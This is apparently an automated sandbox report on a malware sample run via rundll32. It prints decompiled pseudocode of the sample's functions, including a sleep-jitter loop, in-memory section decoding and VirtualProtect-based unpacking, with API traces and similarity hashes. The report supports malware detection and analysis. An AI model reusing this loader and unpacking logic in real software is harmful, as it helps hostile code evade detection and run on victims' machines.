			E044B4B89(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t23 = _v12.dwHighDateTime;
					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t23 >> 5);
					_push(_t16);
					L044B83A6();
					_t34 = _t16 + _t13;
					_t18 = E044B5D2E(_a4, _t34);
					_t30 = _t18;
					_t19 = 3;
					Sleep(_t19 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}

0x044b4b8e
0x044b4b99
0x044b4b9a
0x044b4b9a
0x044b4ba6
0x044b4baf
0x044b4bb2
0x044b4bb6
0x044b4bb8
0x044b4bbd
0x044b4bbe
0x044b4bbf
0x044b4bc9
0x044b4bcc
0x044b4bd3
0x044b4bd7
0x044b4bde
0x044b4be4
0x044b4bee

APIs

SwitchToThread.KERNEL32(?,00000001,?,?,?,044B1D14,?,?), ref: 044B4B9A
GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,044B1D14,?,?), ref: 044B4BA6
_aullrem.NTDLL(00000000,?,00000013,00000000), ref: 044B4BBF

Part of subcall function 044B5D2E: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 044B5D8D

Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,044B1D14,?,?), ref: 044B4BDE

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
String ID:
API String ID: 1610602887-0
Opcode ID: 75a19181fac8af9ca951b727c484025b4deeba92dc605432c60880c05e7b9069
Instruction ID: 53ba1123336b9a60436da9817cbcb889c73cb4dd396549d2e2b17e8a33fe1b3a
Opcode Fuzzy Hash: 75a19181fac8af9ca951b727c484025b4deeba92dc605432c60880c05e7b9069
Instruction Fuzzy Hash: DCF0A4B7A002087BEB149BA5DC1DFDF77BDDB84355F000129F601E7240E678AA0086A0

Uniqueness

Uniqueness Score: -1.00%

Function 00401B7F Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00401B7F(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E00401308(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x00401b88
0x00401b8d
0x00401b9b
0x00401ba0
0x00401ba0
0x00401ba6
0x00401bab
0x00401baf
0x00401bb3
0x00401bb3
0x00401bbd
0x00401bc6

APIs

GetCurrentThread.KERNEL32 ref: 00401B82
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 00401B8D
SetThreadPriority.KERNEL32(00000000,000000FF), ref: 00401BA0
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 00401BB3

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 5ec2324a3aece868636b7716a0e00cb7fbbf2160a91f8f79ca2eaebe1d539e4a
Instruction ID: 530bc985a7ac1ad85ace009cb5ebf350f6c4e318540664810b7604832fdd1336
Opcode Fuzzy Hash: 5ec2324a3aece868636b7716a0e00cb7fbbf2160a91f8f79ca2eaebe1d539e4a
Instruction Fuzzy Hash: 99E09B313062112BD7122F2A5C84D6F7A6CDF923317010336F510B22F0DB788D01856D

Uniqueness

Uniqueness Score: -1.00%

Function 044B765B Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E044B765B(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x44ba3cc; // 0x4e695b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x44ba3cc; // 0x4e695b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x44ba030) {
					HeapFree( *0x44ba2d8, 0, _t8);
				}
				_t9 = E044B6E6D(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x44ba3cc; // 0x4e695b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x044b765b
0x044b765b
0x044b7664
0x044b7674
0x044b7674
0x044b7679
0x044b767e
0x00000000
0x00000000
0x044b766e
0x044b766e
0x044b7680
0x044b7684
0x044b7696
0x044b7696
0x044b76a1
0x044b76a6
0x044b76a9
0x044b76ae
0x044b76b2
0x044b76b8

APIs

RtlEnterCriticalSection.NTDLL(04E69570), ref: 044B7664
Sleep.KERNEL32(0000000A), ref: 044B766E
HeapFree.KERNEL32(00000000,00000000), ref: 044B7696
RtlLeaveCriticalSection.NTDLL(04E69570), ref: 044B76B2

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: cfc6d3f472a3e9dfa419bab80db00c8d589ae9a5783aaec942b2687147af2df8
Instruction ID: fd58ca1aa2d2730086afd1ba90ba55f86d2cf56f935ead559156fe0017f1fcf6
Opcode Fuzzy Hash: cfc6d3f472a3e9dfa419bab80db00c8d589ae9a5783aaec942b2687147af2df8
Instruction Fuzzy Hash: 21F012B02007419BFB24AF69DC48F567BE4EF54744F045405F685E6292D738FC50DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040197C Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040197C(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t58;
				signed int _t67;
				intOrPtr _t69;
				intOrPtr _t85;
				intOrPtr _t86;

				_t85 =  *0x4041b0;
				_t46 = E00401922(_t85,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t86 = _t85 + _v24;
					_v40 = _t86;
					_t53 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t67 <= 0) {
							_t54 =  *0x4041c0;
						} else {
							_t69 = _a4;
							_t58 = _t53 - _t86;
							_t13 = _t69 + 0x4051a7; // 0x4051a7
							_v32 = _t58;
							_v36 = _t58 + _t13;
							_v12 = _t86;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E00401FD8(_v12 + _t58, _v12, _v52 - _v8 + _v48 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x4041c0 = _t54;
								if(_v8 >= _t67) {
									break;
								}
								_t58 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							E0040212B(_v16, _v28, _v40);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}

0x00401983
0x00401993
0x00401998
0x0040199d
0x004019b2
0x004019b9
0x004019be
0x004019cf
0x004019d2
0x004019d8
0x004019dd
0x00401a8d
0x004019e3
0x004019e3
0x004019e9
0x00401a58
0x004019eb
0x004019eb
0x004019ee
0x004019f0
0x004019f8
0x004019fb
0x004019fe
0x00401a06
0x00401a11
0x00401a12
0x00401a13
0x00401a30
0x00401a3e
0x00401a45
0x00401a48
0x00401a4b
0x00401a53
0x00000000
0x00000000
0x00401a03
0x00401a03
0x00401a55
0x00401a62
0x00401a74
0x00401a64
0x00401a6d
0x00401a6d
0x00401a85
0x00401a85
0x00401a94
0x00401a9a

APIs

VirtualAlloc.KERNEL32(00000000,76D863F0,00003000,00000004,00000030,00000000,76D863F0,00000000,?,?,?,?,?,?,0040137D,00000000), ref: 004019D2
VirtualFree.KERNELBASE(0040137D,00000000,00008000,?,?,?,?,?,?,0040137D,00000000), ref: 00401A85

Strings

Apr 26 2022, xrefs: 00401A09

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFree
String ID: Apr 26 2022
API String ID: 2087232378-3671839962
Opcode ID: ae9bb6daa5ee41dbb0380df7045b319595a36fdee4abdb97101aff6bf739f21c
Instruction ID: ba9eff79541a9afd743da593f02ff0d2c34f0f393f471016fce9fbd4e5145794
Opcode Fuzzy Hash: ae9bb6daa5ee41dbb0380df7045b319595a36fdee4abdb97101aff6bf739f21c
Instruction Fuzzy Hash: C9313075E01219DFDB01DF94D980BAEB7B4FF04304F104169E915BB290D775AA46CF98

Uniqueness

Uniqueness Score: -1.00%

Function 044B216C Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B216C(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E044B3695(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x44ba348; // 0x9ad5a8
				_t4 = _t24 + 0x44bbe58; // 0x4e69400
				_t5 = _t24 + 0x44bbe00; // 0x4f0053
				_t26 = E044B155C( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x44ba348; // 0x9ad5a8
						_t11 = _t32 + 0x44bbe4c; // 0x4e693f4
						_t48 = _t11;
						_t12 = _t32 + 0x44bbe00; // 0x4f0053
						_t52 = E044B28C4(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x44ba348; // 0x9ad5a8
							_t13 = _t35 + 0x44bba51; // 0x30314549
							_t37 = E044B41FA(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x44ba2fc - 6;
								if( *0x44ba2fc <= 6) {
									_t42 =  *0x44ba348; // 0x9ad5a8
									_t15 = _t42 + 0x44bbde2; // 0x52384549
									E044B41FA(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x44ba348; // 0x9ad5a8
							_t17 = _t38 + 0x44bbe90; // 0x4e69438
							_t18 = _t38 + 0x44bbe68; // 0x680043
							_t45 = E044B74B6(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x44ba2d8, 0, _t52);
						}
					}
					HeapFree( *0x44ba2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E044B3AC2(_t54);
				}
				return _t45;
			}

0x044b216c
0x044b217c
0x044b217f
0x044b2186
0x044b2188
0x044b2188
0x044b218b
0x044b2190
0x044b2197
0x044b21a4
0x044b21a9
0x044b21ad
0x044b21bb
0x044b21c9
0x044b21cd
0x044b225e
0x044b225e
0x044b21d3
0x044b21d3
0x044b21d8
0x044b21d8
0x044b21df
0x044b21eb
0x044b21ed
0x044b21ef
0x044b21f1
0x044b21f8
0x044b2203
0x044b220a
0x044b220c
0x044b2213
0x044b2215
0x044b221c
0x044b2227
0x044b2227
0x044b2213
0x044b222c
0x044b2231
0x044b2238
0x044b2256
0x044b2258
0x044b2258
0x044b21ef
0x044b226a
0x044b226a
0x044b226c
0x044b2271
0x044b2273
0x044b2273
0x044b227e

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04E69400,00000000,?,76DDF710,00000000,76DDF730), ref: 044B21BB
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04E69438,?,00000000,30314549,00000014,004F0053,04E693F4), ref: 044B2258
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,044B66BE), ref: 044B226A

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e7ff856d40bd9203d787d7669453f1d39abdc1f6350799a69ff9bf7f023df0e6
Instruction ID: 90491be85f28195a46329ec1dc1548b4076a6094374dc603280d3962bf4f0e93
Opcode Fuzzy Hash: e7ff856d40bd9203d787d7669453f1d39abdc1f6350799a69ff9bf7f023df0e6
Instruction Fuzzy Hash: B931B731900218BFEF11DBD5DC48EDE77BCEB44704F1441A6A641AB261D6B1BE54DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00401A9D Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00401A9D(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x4041c0;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}

0x00401aa7
0x00401ab4
0x00401aba
0x00401ac6
0x00401ad6
0x00401ad8
0x00401ae0
0x00401b75
0x00401b7c
0x00000000
0x00000000
0x00000000
0x00401ae6
0x00401ae6
0x00401ae6
0x00401aea
0x00000000
0x00000000
0x00401af6
0x00401afa
0x00401b1e
0x00401b22
0x00401b36
0x00401b36
0x00401b3c
0x00401b4b
0x00401b4f
0x00401b57
0x00401b57
0x00401b5f
0x00401b62
0x00401b6f
0x00000000
0x00000000
0x00000000
0x00000000
0x00401b6f
0x00401b2a
0x00401b2e
0x00401b34
0x00000000
0x00000000
0x00000000
0x00401b34
0x00401b02
0x00401b06
0x00401b10
0x00401b08
0x00401b08
0x00401b08
0x00000000
0x00401b06
0x00000000

APIs

VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?), ref: 00401AD6
VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00401B4B
GetLastError.KERNEL32 ref: 00401B51

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 6ced9a72dc2c1945128a502a870018d78ab80d3f499d1687ade8e6ef3ea2f637
Instruction ID: 25fad19d6578cafab31add35f05609419888c05dd3aa09afcfe302362acdf30b
Opcode Fuzzy Hash: 6ced9a72dc2c1945128a502a870018d78ab80d3f499d1687ade8e6ef3ea2f637
Instruction Fuzzy Hash: 9821607190020AEFCB14DF85C985ABAF7F4FF58345F0144AAD106E7158E3B8BA64CB98

Uniqueness

Uniqueness Score: -1.00%

Function 044B6E6D Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E044B6E6D(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E044B6D63(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x44b9284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x044b6e71
0x044b6e7e
0x044b6e80
0x044b6e81
0x044b6e89
0x044b6e89
0x044b6e8d
0x00000000
0x00000000
0x044b6e84
0x044b6e85
0x044b6e88
0x044b6e88
0x044b6e95
0x044b6e9a
0x044b6e9f
0x044b6ea7
0x044b6ead
0x044b6eaf
0x044b6eb2
0x044b6eb6
0x044b6eb8
0x044b6ebb
0x044b6ebb
0x044b6ebc
0x044b6ebe
0x044b6ebb
0x044b6ec8
0x044b6ecb
0x044b6ece
0x044b6ecf
0x044b6ed1
0x044b6ed8
0x044b6ed8
0x044b6ee4

APIs

StrChrA.SHLWAPI(?,00000020,00000000,04E695AC,?,?,044B76A6,?,04E695AC), ref: 044B6E89
StrTrimA.SHLWAPI(?,044B9284,00000002,?,044B76A6,?,04E695AC), ref: 044B6EA7
StrChrA.SHLWAPI(?,00000020,?,044B76A6,?,04E695AC), ref: 044B6EB2

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 4cd0a69c0b3568a3975fa63f02bdb4733f461b306484c73ebe615f9ee5bf9adf
Instruction ID: 63f2257cbcc4f23f069bb8082828687ea31939e0efb78472357b667d51e4a606
Opcode Fuzzy Hash: 4cd0a69c0b3568a3975fa63f02bdb4733f461b306484c73ebe615f9ee5bf9adf
Instruction Fuzzy Hash: E3019E613003556FFF204A2ACC88BAB7A9DEB85741F060012AA85CB342DA70E802C7F1

Uniqueness

Uniqueness Score: -1.00%

Function 044B46CB Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E044B46CB(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E044B74FE(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x44ba348; // 0x9ad5a8
						_t20 = _t68 + 0x44bb1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E044B65D1(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x044b46d1
0x044b46d4
0x044b46e4
0x044b46ed
0x044b46f1
0x044b47bf
0x044b47c5
0x044b47c5
0x044b470b
0x044b4710
0x044b4714
0x044b471a
0x044b471f
0x044b4726
0x044b4735
0x044b4735
0x044b4739
0x044b473b
0x044b4747
0x044b4752
0x044b475d
0x044b4761
0x044b476b
0x044b476f
0x044b4771
0x044b4776
0x044b477d
0x044b478d
0x044b478d
0x044b4776
0x044b476f
0x044b478f
0x044b4794
0x044b4799
0x044b4799
0x044b479c
0x044b47a5
0x044b47aa
0x044b47aa
0x044b47af
0x044b47b4
0x044b47b4
0x044b47af
0x044b4739
0x044b47b6
0x044b47bc
0x00000000

APIs

Part of subcall function 044B74FE: SysAllocString.OLEAUT32(80000002), ref: 044B755B
Part of subcall function 044B74FE: SysFreeString.OLEAUT32(00000000), ref: 044B75C1

SysFreeString.OLEAUT32(?), ref: 044B47AA
SysFreeString.OLEAUT32(044B3520), ref: 044B47B4

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 78d14a397ec693fab1f758ba30a005a4dab2f656ca6f209ccf2b0cb46c87ebd2
Instruction ID: 6865dd3ca3bb11f1f0bd9169605f0c1835188465023aa8fbce724aca4ecb00ed
Opcode Fuzzy Hash: 78d14a397ec693fab1f758ba30a005a4dab2f656ca6f209ccf2b0cb46c87ebd2
Instruction Fuzzy Hash: A7316975500118AFCF21DFA9C888CDBBBBAEBCA7507204659FD459B211D631ED51CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00401BC9 Relevance: 3.1, APIs: 2, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401BC9() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x4041c4;
				if( *0x4041ac > 5) {
					_t16 = _t15 + 0x4050f9;
				} else {
					_t16 = _t15 + 0x4050b1;
				}
				E00401FB2(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E004011DE( &_v32,  &_v16,  *0x4041c0 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x4041b8);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E00401C83(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t40 =  *0x4041b8;
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x4041b8 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E0040212B(_t45, _t40, _t32 + 4);
						}
					}
					_t25 = E0040153F(_v28); // executed
				}
				ExitThread(_t25);
			}

0x00401bcf
0x00401be0
0x00401bea
0x00401be2
0x00401be2
0x00401be2
0x00401bf1
0x00401bfa
0x00401bff
0x00401c1d
0x00401c7a
0x00401c1f
0x00401c25
0x00401c2b
0x00401c39
0x00401c3d
0x00401c44
0x00401c46
0x00401c4c
0x00401c50
0x00401c58
0x00401c69
0x00401c5a
0x00401c60
0x00401c60
0x00401c58
0x00401c71
